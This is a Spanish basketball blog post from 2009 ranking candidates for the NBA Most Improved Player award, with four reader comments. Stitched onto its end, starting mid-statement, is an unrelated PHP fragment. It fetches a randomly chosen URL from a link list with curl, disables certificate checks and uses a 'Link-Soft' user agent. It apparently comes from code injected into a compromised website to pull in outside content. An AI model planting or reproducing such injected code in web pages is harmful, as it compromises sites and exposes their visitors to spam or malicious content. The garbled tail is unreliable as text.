Pronósticos TJ: MIP

12 de November de 2009 por Viva_Dirk

Ha pasado un tiempo pero aquí vuelven nuestras predicciones para los diferentes premios de la NBA. Recordad que las apuestas las hicimos cuando todavía no había empezado la temporada y seguro que habrá más de un nombre que os chirriará como ahora nos chirría a nosotros.

Este premio es posiblemente el mas incierto de todos, ya que es difícil ver a un MVP en un equipo sin más de 50 victorias, un ROY que no haya sido elegido en el top-10 del draft o un entrenador del año de un equipo de la zona baja. En cambio, el MIP puede llevarselo un jugador de cualquier equipo, sea alguien que haya jugado muy pocos minutos hasta ahora o alguien que jugando casi lo mismo evolucione mucho su juego.

Como es normal aquí aparecen muchos mas candidatos, hasta un total de 15, pero a pesar de la incertidumbre un nombre destaca por encima del resto.

Con un punto tenemos a Francisco García, Nick Young, Danillo Gallinari, Eric Gordon y Roy Hibbert. García ya empieza la temporada lesionado, Nick Young se enfrenta a más competencia que otros años y los otros tres son sophomores. No es que tengamos algo contra los jugadores de segundo año pero no es muy común que se alcen con este galardón.

Dos ala-pívots de muy distinto estilo han recibido dos puntos: Tyrus Thomas y Charlie Villanueva. Thomas se consolidó en los Bulls como un buen intimidador y un jugador perfecto para el juego rápido. Si progresa en el tiro de media distancia y su cabeza no le juega ninguna mala pasada debería mejorar. De nuevo la cabeza es lo único que haría dudar del rendimiento de Villanueva en los Pistons donde va a tener todo el protagonismo que le ha faltado hasta ahora. Si esta centrado es un jugadorazo y una apuesta nada descabellada.

En el siguiente escalón aparecen Courtney Lee y Anthony Morrow que deben tener muchos minutos en sus equipos. Lee ha llegado a los Nets  prácticamente para sustituir a Carter y da la impresión de ser un jugador que rinde más en la cancha que en la hoja de estadísticas. En cambio, Morrow es un tirador letal. Ayuda en el rebote y no es mal defensor pero lo que le hace destacar es una prodigiosa muñeca para la larga y corta distancia.

Casi en el podio tenemos a tres jugadores: Rudy Fernandez, Sergio Rodriguez y Ramon Sessions. Rudy tras un año muy bueno como rookie debería al menos mantener sus minutos en cancha y no limitarse a tirar de tres, pero no estamos seguros de que McMillan piense como nosotros. Sergio llegaba a los Kings como segundo base, lo que nos hacía pensar en casi 20 minutitos por partidos, pero ahora mismo la cosas pintan aún peor que en los Blazers. Y Sessions ha firmado un buen contrato, es un jugador capaz de anotar y hacer anotar a sus compañeros. Segun funcione Flynn le veremos más o menos minutos.

El tercer puesto con 9 puntos es para Russell Westbrook , el cual sorprendió a la gran mayoría con una adaptación inmediata a la NBA y lo que es más sorprendente, al puesto de base. Tiene toda la confianza de la franquicia y es un trabajador incansable. Seguro que le veremos haciendo cada vez más cosas.

La plata con 16 puntos para un falso sophomore, Greg Oden, del que muchos aún esperamos que sea un center dominante.  Tiene todas las cualidades para ser demoledor en ambos lados de la cancha, pero a parte de su incapacidad total para protegerse de hacer faltas,y de una salud delicada, juega en Portland donde los balones, precisamante, no sobran.

Y nuestro favoritos de forma indiscutible es el jugador de los Warriors, Anthony Randolph con 55 puntos. Randolph con sus casi 2.10 de estatura tiene la velocidad, coordinación y el manejo de balón de un alero, a la vez que es una bestia bajo los aros tanto reboteando como intimidando. Desde la franquicia confian en él como la pieza que les devuelva a los en play-offs en los años venideros.

Comenta

4 comentarios a esta entrada

  1. rojorob dice:
    #1

    Ni Adelman ni Van Gundy. El mejor entrenador del momento es Byron Scott, y este año lo va a demostrar con los Hornets.

      Citar

  2. rojorob dice:
    #2

    No, ahora en serio. Le han echado.

      Citar

  3. TheDeerHunter dice:
    #3

    Habría que puntualizar que este tipo de votaciones las hicimos al principio de temporada. Cualquiera podría pensar que estamos locos al nombrar, por ejemplo, a Sergio en este apartado.
    Lo de Scott, lo siento mucho, para mí es un muy buen entrenador que espero pueda entrenar a los Lakers alguna vez. Siempre lo mismo. Le hacen un equipo de mierda y la culpa para él a las primeras de cambio. En cualquier caso no se va a la cola del paro el hombre, ni le dejan con una mano delante y otra detrás… así que penica la justa en estos tiempos que corren.

      Citar

  4. Dantley2 dice:
    #4

    Bueno, como dice Deer, hay que verlo con perspectiva, pero de momento los tres del podio todavía están en la carrera. Cierto que Westbrook algo alejado, pero Oden y Randolph (si al gaga Nelson le da la gana) están mejorando en media. Con Sergio poco hay que decir, Rudy así así y Sessions con el puesto de base perdido frente a Flynn.

    Ahora mismo la cosa estaría entre Bynum, Hibbert, Speights, Douglas-Roberts, Frye, Thompson y algún otro, no sé si contar a Hughes y Kaman. Personalmente sigo pensando que Randolph sigue estando ahí arriba. Es cuestión de que le den minutos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>